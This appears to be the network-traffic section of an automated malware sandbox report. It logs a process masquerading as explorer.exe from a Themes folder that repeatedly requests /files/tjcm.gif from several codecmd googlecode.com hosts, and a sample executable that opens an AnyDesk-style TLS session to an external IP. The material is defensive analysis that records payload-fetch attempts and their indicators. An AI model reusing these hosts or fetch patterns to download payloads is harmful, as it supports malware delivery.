Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:03.683681965 CEST | 2675 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:03 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:03.683696032 CEST | 2676 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.5 | 49873 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:05.836945057 CEST | 2677 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:05.863981009 CEST | 2678 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:05 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:05.864008904 CEST | 2678 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.5 | 49874 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:07.158910990 CEST | 2679 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:07.186203957 CEST | 2681 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:07 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:07.186244011 CEST | 2681 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.5 | 49875 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:08.679080009 CEST | 2682 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:08.708112955 CEST | 2683 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:08 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:08.708139896 CEST | 2684 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.5 | 49876 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:10.971801043 CEST | 2684 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:10.998584032 CEST | 2686 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:10 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:10.998608112 CEST | 2686 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.5 | 49877 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:12.329263926 CEST | 2687 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:12.355820894 CEST | 2688 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:12 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:12.355838060 CEST | 2689 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.5 | 49879 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:13.655021906 CEST | 2697 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:13.681955099 CEST | 2698 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:13 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:13.682207108 CEST | 2699 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.5 | 49880 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:15.027226925 CEST | 2699 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:15.063011885 CEST | 2701 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:15 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:15.063050032 CEST | 2701 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.5 | 49881 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:16.399426937 CEST | 2702 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:16.426215887 CEST | 2703 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:16 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:16.426249981 CEST | 2704 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.5 | 49882 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:17.677611113 CEST | 2704 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:17.704286098 CEST | 2706 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:17 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:17.704376936 CEST | 2706 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49805 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:26.842829943 CEST | 1781 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:26.869627953 CEST | 1782 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:26 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:26.869663000 CEST | 1782 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.5 | 49885 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:18.986483097 CEST | 2720 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:19.013293982 CEST | 2722 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:18 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.5 | 49886 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:20.281632900 CEST | 2723 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:20.308252096 CEST | 2724 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:20 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.5 | 49888 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:21.579205036 CEST | 2729 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:21.605839014 CEST | 2734 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:21 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.5 | 49890 | 92.223.88.41 | 80 | C:\Users\user\Desktop\sj9q8uwmax.exe
Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                Jul 16, 2022 23:58:25.439656973 CEST2740OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 77 04 04 b4 48 0b 26 41 a0 22 37 0a d1 da 90 7c 1a ea cf e7 7f 96 78 3c f4 25 e0 b7 eb 2f d2 9e 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                Data Ascii: wH&A"7|x<%/n0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                Jul 16, 2022 23:58:25.470498085 CEST2742INData Raw: 16 03 03 00 57 02 00 00 53 03 03 62 d3 34 81 81 e8 36 18 54 46 5a eb 8b 88 9e 6e 1c 6d 39 e1 8c 29 fe ce 44 4f 57 4e 47 52 44 01 20 bc 1c d1 ef ed 28 68 db 4a 74 63 f1 a6 7b 61 81 61 1d 5a f0 bb 6c 10 45 12 b5 cf ab 5f 73 e8 69 c0 2c 00 00 0b ff
                                                                                                                                                                                Data Ascii: WSb46TFZnm9)DOWNGRD (hJtc{aaZlE_si,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                Jul 16, 2022 23:58:25.470537901 CEST2743INData Raw: e0 cd 68 3b 6a 87 6c a6 0d e7 d8 bd 61 df 56 6b 2a e1 1c 2b f5 9f bf 85 dd 8c 5b 06 1e 71 7f ba 4a a6 40 b0 77 17 ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63 86 83 ac 70 84 75 27 2d 35 3d 7b 7b a8 ce
                                                                                                                                                                                Data Ascii: h;jlaVk*+[qJ@w,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_eCL/3
                                                                                                                                                                                Jul 16, 2022 23:58:25.494404078 CEST2744OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 32 30 37 31 37 30 36 35 37
                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 220717065706Z20720704065706Z010UAnyDesk Client0"0*H0uaq4_8[_|_,zN+i/q)NU*E:uFQ[Z+
                                                                                                                                                                                Jul 16, 2022 23:58:25.529814959 CEST2744INData Raw: 15 03 03 00 02 02 2d
                                                                                                                                                                                Data Ascii: -


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
